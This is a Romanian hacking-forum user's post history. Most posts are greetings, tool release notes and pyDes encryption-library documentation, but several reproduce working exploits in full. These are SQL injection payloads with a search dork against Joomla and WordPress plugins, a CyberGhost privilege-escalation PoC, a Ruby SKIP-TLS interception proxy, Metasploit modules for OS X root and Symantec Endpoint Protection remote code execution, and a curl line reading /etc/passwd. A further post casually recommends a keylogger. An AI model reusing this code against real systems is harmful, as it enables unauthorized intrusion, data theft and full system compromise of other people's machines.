Jump to content

KhiZaRix

Active Members
  • Posts

    245
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by KhiZaRix

  1. Bine ai venit , like la prezentare.
  2. Eram sigur =))) am stat ceva timp prin Slatina.
  3. Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability. # Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection # Date: 2017-03-23 # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Google Dork : inurl:index.php?option=com_focalpoint # Telegram Channel AND Demo: @PersianHackTeam # Tested on: WIN # POC : id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers Sursa/Source: https://packetstormsecurity.com/files/141793/Joomla-FocalPoint-1.2.3-SQL-Injection.html
  4. Prin ce oraș? pare ff cunoscut
  5. okay , cand se termină , adică Joi , vă contactez și vă explic.
  6. Stegano 0.6.9 Changes: Introduces some type hints (PEP 484). More tests for the generators and for the tools module. Updated descriptions of generators. Fixed a bug with a generator that has been previously renamed. Download: https://packetstormsecurity.com/files/download/141598/Stegano-0.6.9.tar.gz
  7. Salut , am să te contactez pe private și am să-ți explic.
  8. CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # # Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  9. Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information. Changes: Fixed an error when revealing a hidden binary file in an image. Download: https://packetstormsecurity.com/files/download/141562/Stegano-0.6.8.tar.gz Source: https://packetstormsecurity.com/files/141562/Stegano-0.6.8.html
  10. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  11. # Exploit CyberGhost 6.0.4.2205 Privilege Escalation # Date: 06.03.2017 # Software Link: http://www.cyberghostvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want. https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html 2. Proof of Concept using System; using CyberGhost.Communication; namespace cyber { class Program { static void Main(string[] args) { Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation"); Console.WriteLine("by Kacper Szurek"); Console.WriteLine("http://security.szurek.pl/"); Console.WriteLine("https://twitter.com/KacperSzurek"); PeLauncherOptions options = new PeLauncherOptions(); options.ExecuteableName = "sethc.exe"; options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe"; EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe"); CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add); Console.WriteLine("Now logout and then press SHIFT key 5 times"); } } } Sursa/Source: https://packetstormsecurity.com/files/141455/CyberGhost-6.0.4.2205-Privilege-Escalation.html
  12. @NickyRo Din cate știam Ardamaxu era bun. Doar că ți-aș recomanda să nu te joci cu focul. Și referitor la email, nu ți-aș recomanda pe email, ci un panel ceva.
  13. https://gyazo.com/55dca29bc0759fe726411422c1062bf5 Nu prea mult cu vorbe goale , doar puțină bătaie de cap. Mi-a luat aproximativ o oră să fac tot / testez. Diff: Moderat Reward: 404 HINT: Razele de lumină au fost oprite de către Caesar. Pentru mici HINT-uri, PM Succes. Se termină pe : 16.03.2017 Au rezolvat: #1 @u0m3 #2 @Usr6 #3 @new_luca #4 @Hertz
  14. Java Secure Socket Extension (JSSE) SKIP-TLS exploit that has been tested on JDK 8u25 and 7u72. This is a stand-alone ruby exploit and does not require Metasploit. #!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain. require 'openssl' require 'optparse' require 'socket' Version = [0, 0, 1] Release = nil def prf(secret, label, seed) if secret.empty? s1 = s2 = '' else length = ((secret.length * 1.0) / 2).ceil s1 = secret[0..(length - 1)] s2 = secret[(length - 1)..(secret.length - 1)] end hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed) hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed) hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed) hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha1 + label + seed) result = '' [hmac_md5.length, hmac_sha1.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha1.getbyte(i) || 0)].pack('C') } result end def prf_sha256(secret, label, seed) hmac_sha256 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed) OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_sha256 + label + seed) end class String def hexdump(stream=$stdout) 0.step(bytesize - 1, 16) do |i| stream.printf('%08x ', i) 0.upto(15) do |j| stream.printf(' ') if j == 8 if i + j >= bytesize stream.printf(' ') else stream.printf('%02x ', getbyte(i + j)) end end stream.printf(' ') 0.upto(15) do |j| if i + j >= bytesize stream.printf(' ') else if /[[:print:]]/ === getbyte(i + j).chr && /[^[:space:]]/ === getbyte(i + j).chr stream.printf('%c', getbyte(i + j)) else stream.printf('.') end end end stream.printf("\n") end end end options = {} OptionParser.new do |parser| parser.banner = "Usage: #{parser.program_name} [options] host" parser.separator('') parser.separator('Options:') parser.on('-H', '--local-host HOST', 'Local host') do |host| options[:local_host] = host end parser.on('-P', '--local-port PORT', 'Local port') do |port| options[:local_port] = port end parser.on('-d', '--debug', 'Debug mode') do options[:debug] = true end parser.on('-h', '--help', 'Show this message') do puts parser exit end parser.on('-o', '--output FILE', 'Output file') do |file| options[:file] = File.new(file, 'w+b') end parser.on('-p', '--port PORT', 'Port') do |port| options[:port] = port end parser.on('-v', '--verbose', 'Verbose mode') do options[:verbose] = true end parser.on('--version', 'Show version') do puts parser.ver exit end end.parse! local_host = options[:local_host] || '0.0.0.0' local_port = options[:local_port] || 443 debug = options[:debug] || false file = options[:file] || nil host = ARGV[0] or fail ArgumentError, 'no host given' port = options[:port] || 443 verbose = options[:verbose] || false proxy = TCPServer.new(local_host, local_port) puts 'Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]] if debug || verbose loop do Thread.start(proxy.accept) do |client| puts 'Accepted connection from %s:%d' % [client.peeraddr[2], client.peeraddr[1]] if debug || verbose finished_sent = false handshake_messages = '' version = '' context = OpenSSL::SSL::SSLContext.new(:TLSv1) context.verify_mode = OpenSSL::SSL::VERIFY_NONE tcp_socket = TCPSocket.new(host, port) ssl_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context) ssl_server.connect puts 'Connected to %s:%d' % [ssl_server.peeraddr[2], ssl_server.peeraddr[1]] if debug || verbose server = TCPSocket.new(host, port) puts 'Connected to %s:%d' % [server.peeraddr[2], server.peeraddr[1]] if debug || verbose loop do readable, = IO.select([client, server]) readable.each do |r| if r == ssl_server # ssl_server is an SSL socket; read application data directly header = '' fragment = r.readpartial(4096) fragment.hexdump($stderr) if debug puts '%d bytes received' % [fragment.bytesize] if debug || verbose else header = r.read(5) raise EOFError if header.nil? header.hexdump($stderr) if debug puts '%d bytes received' % [header.bytesize] if debug || verbose fragment = r.read(header[3, 2].unpack('n')[0]) fragment.hexdump($stderr) if debug puts '%d bytes received' % [fragment.bytesize] if debug || verbose end if finished_sent if file # Save application data file.write(fragment) file.flush file.fsync end elsif fragment =~ /^\x0e\x00\x00\x00/ # server_hello_done # Drop the server hello done message and send the finished # message in plaintext. if header[2, 1] == "\x03" verify_data = prf_sha256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages)) verify_data = verify_data[0, 12] else verify_data = prf('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages)) verify_data = verify_data[0, 12] end finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}" record = header[0, 3] + [finished.length].pack('n') + finished count = client.write(record) client.flush record.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose finished_sent = true # Change to the SSL socket server.close server = ssl_server # Save version used in the handshake version = header[2, 1] next else # Save handshake messages handshake_messages << fragment end case r when client if finished_sent # server is an SSL socket count = server.write(fragment) server.flush fragment.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose else # server isn't an SSL socket record = header + fragment count = server.write(record) server.flush record.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose end when ssl_server # client isn't an SSL socket; add the record layer header with # the same version used in the handshake. header = "\x17\x03#{version}" + [fragment.length].pack('n') record = header + fragment count = client.write(record) client.flush record.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose when server record = header + fragment count = client.write(record) client.flush record.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose end end end client.close server.close end end proxy.close Source: https://dl.packetstormsecurity.net/1511-exploits/rcvalle_skiptls.rb.txt
  15. ?tiu c? nu prea mai am activitate ?i i really dont give a single fuck , but bro , dac? postezi un program de Hax0r Bruteforce de SSH specific? ?i tu mai multe (versiuni protocoale ?i etc.. ) , nu arunci un link ?i gata... , un scan ceva, în fine, nu recomand bruteforce de pe windows , mai ales dac? windowsul este pe pc-ul t?u Edit:// din câte am v?zut nu l-ai testat, prietene înainte s? arunci ceva testeaz?, nu arunci pe forum orice gunoi. nu m? considera hater dar asta este..
  16. 227 Exploits from August 2015 Source + Download : https://packetstormsecurity.com/files/download/133393/1508-exploits.tgz
  17. KhiZaRix

    pyDes

    Dac? este mare lenea de citit, d?-i un scroll pana jos la surs?. Author: Todd Whiteman Issue Date: 28th April, 2010 Version: 2.0.1 Compatibility: Requires Python 2.2 or higher, an older Python 1.5.2 compatible module can be found in the CVS source. Download ( Unix/PC ) = http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.tar.gz / http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.zip About pyDES This is a pure python implementation of the DES encryption algorithm. It is in pure python to avoid portability issues, since most DES implementations are programmed in C (for performance reasons). Triple DES class is also implemented, utilising the DES base. Triple DES is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key. See the "About triple DES" section below more info on this algorithm. The code below is not written for speed or performance, so not for those needing a fast des implementation, but rather a handy portable solution ideal for small usage. It takes my AMD2000+ machine 1 second per 2.5 kilobyte to encrypt or decrypt using the DES method. Thats very SLOW!! About triple DES Triple DES is just running the DES algorithm 3 times over the data with the specified key. The supplied key is split up into 3 parts, each part being 8 bytes long (the mandatory key size for DES). The triple DES algorithm uses the DES-EDE3 method when a 24 byte key is supplied. This means there are three DES operations in the sequence encrypt-decrypt-encrypt with the three different keys. The first key will be bytes 1 to 8, the second key bytes 9 to 16 and the third key bytes 17 to 24. If a 16 byte key is supplied instead, the triple DES method used will be DES-EDE2. This means there are three DES operations in the sequence encrypt-decrypt-encrypt, but the first and third operations use the same key. The first/third key will be bytes 1 to 8 and the second key bytes 9 to 16. Installation 1 Extract the files from the pyDes archive. 2 Run the following command: python setup.py install 3 To test, run: python test_pydes.py Note: On Unix, you'd run this command from a shell prompt; on Windows, you have to open a command prompt window (``DOS box'') and do it there; pyDes Usage Class initialization -------------------- pyDes.des(key, [mode], [IV], [pad], [padmode]) pyDes.triple_des(key, [mode], [IV], [pad], [padmode]) key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes for Triple DES mode -> Optional argument for encryption type, can be either pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) IV -> Optional Initial Value bytes, must be supplied if using CBC mode. Length must be 8 bytes. pad -> Optional argument, set the pad character (PAD_NORMAL) to use during all encrypt/decrpt operations done with this instance. padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5) to use during all encrypt/decrpt operations done with this instance. I recommend to use PAD_PKCS5 padding, as then you never need to worry about any padding issues, as the padding can be removed unambiguously upon decrypting data that was encrypted using PAD_PKCS5 padmode. Common methods -------------- encrypt(data, [pad], [padmode]) decrypt(data, [pad], [padmode]) data -> Bytes to be encrypted/decrypted pad -> Optional argument. Only when using padmode of PAD_NORMAL. For encryption, adds this characters to the end of the data block when data is not a multiple of 8 bytes. For decryption, will remove the trailing characters that match this pad character from the last 8 bytes of the unencrypted data block. padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL or PAD_PKCS5). Defaults to PAD_NORMAL. Example ------- from pyDes import * # For Python3, you'll need to use bytes, i.e.: # data = b"Please encrypt my data" # k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5) data = "Please encrypt my data" k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5) d = k.encrypt(data) print "Encrypted: %r" % d print "Decrypted: %r" % k.decrypt(d) assert k.decrypt(d, padmode=PAD_PKCS5) == data Sources : pyDes - Pure Python DES encryption algorithm / pyDES download | SourceForge.net Credits Thanks go to: David Broadwell for his ideas, comments and suggestions. Mario Wolff for finding errors in triple des CBC. Santiago Palladino for enlightening me on the PKCS5 padding technique. Shaya for correcting the PAD_PKCS5 triple des CBC errors. Yoav Aner for spotting a triple des CBC IV error.Thanks go to: David Broadwell for his ideas, comments and suggestions. Mario Wolff for finding errors in triple des CBC. Santiago Palladino for enlightening me on the PKCS5 padding technique. Shaya for correcting the PAD_PKCS5 triple des CBC errors. Yoav Aner for spotting a triple des CBC IV error.
  18. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Mac OS X "tpwn" Privilege Escalation', 'Description' => %q{ This module exploits a null pointer dereference in XNU to escalate privileges to root. Tested on 10.10.4 and 10.10.5. }, 'Author' => [ 'qwertyoruiop', # Vulnerability discovery and PoC 'wvu' # Copy/paste monkey ], 'References' => [ ['URL', 'https://github.com/kpwn/tpwn'] ], 'DisclosureDate' => 'Aug 16 2015', 'License' => MSF_LICENSE, 'Platform' => 'osx', 'Arch' => ARCH_X86_64, 'SessionTypes' => ['shell'], 'Privileged' => true, 'Targets' => [ ['Mac OS X 10.10.4-10.10.5', {}] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) ]) end def check ver?? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe end def exploit print_status("Writing exploit to `#{exploit_file}'") write_file(exploit_file, binary_exploit) register_file_for_cleanup(exploit_file) print_status("Writing payload to `#{payload_file}'") write_file(payload_file, binary_payload) register_file_for_cleanup(payload_file) print_status('Executing exploit...') cmd_exec(sploit) print_status('Executing payload...') cmd_exec(payload_file) end def ver? Gem::Version.new(get_sysinfo['ProductVersion']).between?( Gem::Version.new('10.10.4'), Gem::Version.new('10.10.5') ) end def sploit "chmod +x #{exploit_file} #{payload_file} && #{exploit_file}" end def binary_exploit File.read(File.join( Msf::Config.data_directory, 'exploits', 'tpwn', 'tpwn' )) end def binary_payload Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) end def exploit_file @Exploit_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end def payload_file @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end end Sursa > https://dl.packetstormsecurity.net/1508-exploits/tpwn.rb.txt
  19. ## # This module requires Metasploit: [url=http://metasploit.com/download]Penetration Testing Tool, Metasploit, Free Download | Rapid7[/url] # Current source: [url]https://github.com/rapid7/metasploit-framework[/url] ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', #discovery 'bperry' # metasploit module ], 'References' => [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8443), OptString.new('TARGETURI', [true, 'The path of the web application', '/']), ], self.class) end def exploit meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) print_status("#{peer} - Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_post' => { 'ActionType' => 'ResetPassword', 'UserID' => 'admin', 'Domain' => '' } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies if cookie.nil? || cookie.empty? fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe", 'KnownHosts' => '.' }, 'data' => payload.encoded_exe, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") print_status("#{peer} - Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp", 'KnownHosts' => '.' }, 'data' => exec, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") print_status("#{peer} - Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) end end Source: https://dl.packetstormsecurity.net/1508-exploits/sepm_auth_bypass_rce.rb.txt
  20. Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 <?php 2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) { 3 $file = $_GET['file']; 4 5 header( 'Content-Type: application/zip' ); 6 header( 'Content-Disposition: attachment; filename="' . $file . '"' ); 7 readfile( $file ); 8 unlink( $file ); 9 10 exit; 11 } 12 ?> CVEID: TBD Exploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd Screen Shots: Advisory: http://www.vapid.dhs.org/advisory.php?v=135 Source: https://dl.packetstormsecurity.net/1507-exploits/wpimageexport-download.txt
  21. Gyazo - 0041a9f7e6035d2461f7b1c0820cbd05.png Pân? la urm? o fii bine ce o f?cut ?i @Aerosol, c? ?i a?a era mult? agita?ie cu anti-aerosol (hateri) sau alte c?caturi, cum ar fi luatul la mi?to ?i cuno?tin?ele lui, c? mul?i zic c? nu ?tie, c? nu face, c? nu ?tiu ce ... pân? la urm? înva?? omul( nu ?in cu nimeni doar o p?rere ).
  22. Serialepenet ? cumva? Gyazo - 0041a9f7e6035d2461f7b1c0820cbd05.png
  23. Salut pu?tiule , s? nu mergi pe partea gre?it? cu floodul nici nu am citit tot ?i totu?i mi-a s?rit în ochi ( IP ) , vezi ce faci pe skype, Bine ai venit, sper sa înve?i lucruri bune de aici
×
×
  • Create New...